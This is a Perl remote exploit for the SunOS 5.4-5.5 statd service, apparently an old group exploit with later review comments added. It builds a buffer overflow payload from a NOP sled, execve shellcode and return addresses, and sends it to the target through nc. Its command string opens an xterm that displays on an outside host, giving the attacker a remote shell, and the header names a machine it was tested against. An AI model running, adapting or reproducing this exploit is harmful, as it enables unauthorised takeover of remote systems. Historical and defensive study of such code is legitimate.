#!/usr/bin/perl 
# Woodoo H.C. SunOS 5.4-5.5 statd remote exploit.  
# Do not distribute. Just for Woodoo members
# To find the right offset, trace the target... (warning: statd is standalone)
# Edit the $command string before you run. This shellcode does
# not work on every architecture, so if you can, replace it with
# one for your target's architecture (that is not too hard).
# Tested on SunOS 5.5 (suni.bke.hu) - and works fine :)

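use strict;
use warnings;

# --- Payload pieces ----------------------------------------------------------

# Shellcode as shipped.  These are Linux/x86 bytes (int 0x80 syscalls), not
# SPARC, so on the SunOS targets named in the header it will not execute
# as-is -- the original author says as much.  Reading the bytes it is the
# well-known execve() stub that expects its argument string to follow the
# final call: it stores a NUL at offset 7 of that string (\x88\x46\x07) and
# two pointers at offsets 8 and 12 (\x89\x76\x08, \x89\x46\x0c), so a
# $command longer than 7 bytes gets truncated and partly overwritten.
# NOTE(review): confirm against a disassembly before relying on this.
my $sshellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"
               . "\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
               . "\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
               . "\x40\xcd\x80\xe8\xdc\xff\xff\xff";

# Alternative shellcode in SPARC asm, kept from the original file (unused):
#"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
#"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
#"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
#"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
#"\x91\xd0\x20\x08"

# Command string placed directly after the shellcode (edit before use).
my $command   = "/usr/openwin/bin/xterm -display crow.penguinpowered.com:0.0";
my $buffsize  = 1024;           # payload length reached before the trailing "\n\n"
my $bufofs    = "0x80fb43a0";   # base return address; tuned via the optional offset arg
my $NOP       = "\x90";         # x86 NOP (0x90), matching the x86 shellcode above
my $NOP_COUNT = 750;            # length of the NOP sled

# --- Helpers -----------------------------------------------------------------

# Assemble the datagram: NOP sled, shellcode, command string, then the packed
# (big-endian, as in the original) return address repeated until the buffer
# is at least $size bytes long -- it may overshoot by up to 3 bytes -- plus
# the terminating "\n\n".
#
# The return-address slots begin at offset
# $NOP_COUNT + length($sshellcode) + length($cmd); changing $command by a
# length that is not a multiple of 4 shifts their alignment.
sub build_payload {
    my ($ret_addr, $cmd, $size) = @_;
    my $slot    = pack('N', $ret_addr);
    my $payload = ($NOP x $NOP_COUNT) . $sshellcode . $cmd;
    $payload .= $slot while length($payload) < $size;
    return $payload . "\n\n";
}

# Parse arguments, build the payload and stream it to statd through nc.
# Arguments: host, port, [offset].  Returns the process exit status.
sub main {
    my @args = @_;
    if (@args < 2 || $args[1] !~ /\A\d+\z/) {
        print "Usage: ./wstatd.pl host port [offset]\n\n";
        return 1;               # usage error -> non-zero (the original exited 0)
    }
    my ($thost, $tport, $userofs) = @args;

    # The offset defaults to 0 and must be a signed decimal integer; the
    # original added whatever was given, which Perl numifies to 0 (with a
    # warning) for a typo, silently using the base address.
    $userofs = 0 unless defined $userofs && length $userofs;
    $userofs =~ /\A-?\d+\z/
        or die "offset must be a decimal integer, got '$userofs'\n";

    # The host is handed to nc as an argv element (no shell below), but a
    # value starting with '-' would still be taken by nc as an option.
    $thost =~ /\A[^-\s]\S*\z/
        or die "host must not start with '-' or contain whitespace\n";

    my $ofs     = hex($bufofs) + $userofs;
    my $payload = build_payload($ofs, $command, $buffsize);

    # Print the numeric address.  The original printf'd the *packed* string
    # with %x, which numifies to 0, so it always displayed "0".
    printf "\nConnect to %s : %s offset: %x\n\n", $thost, $tport, $ofs;

    # Pipe straight into nc.  This replaces the predictable /tmp/statd-$$.spl
    # file (unchecked 2-arg open on a symlink-able name, removed with an
    # unchecked `rm`) and the shell-interpolated system() line, which let a
    # crafted host argument run arbitrary commands.  The list form of open
    # needs Perl 5.8 or newer.
    open(my $nc, '|-', 'nc', '-v', '-u', $thost, $tport)
        or die "cannot start nc: $!\n";
    binmode $nc;
    print {$nc} $payload or die "write to nc failed: $!\n";
    # On a pipe, close() is false when nc exits non-zero; $! is then 0 and
    # the status lives in $?.
    close $nc
        or die "nc failed: " . ($! ? $! : "exit status " . ($? >> 8)) . "\n";
    return 0;
}

exit main(@ARGV);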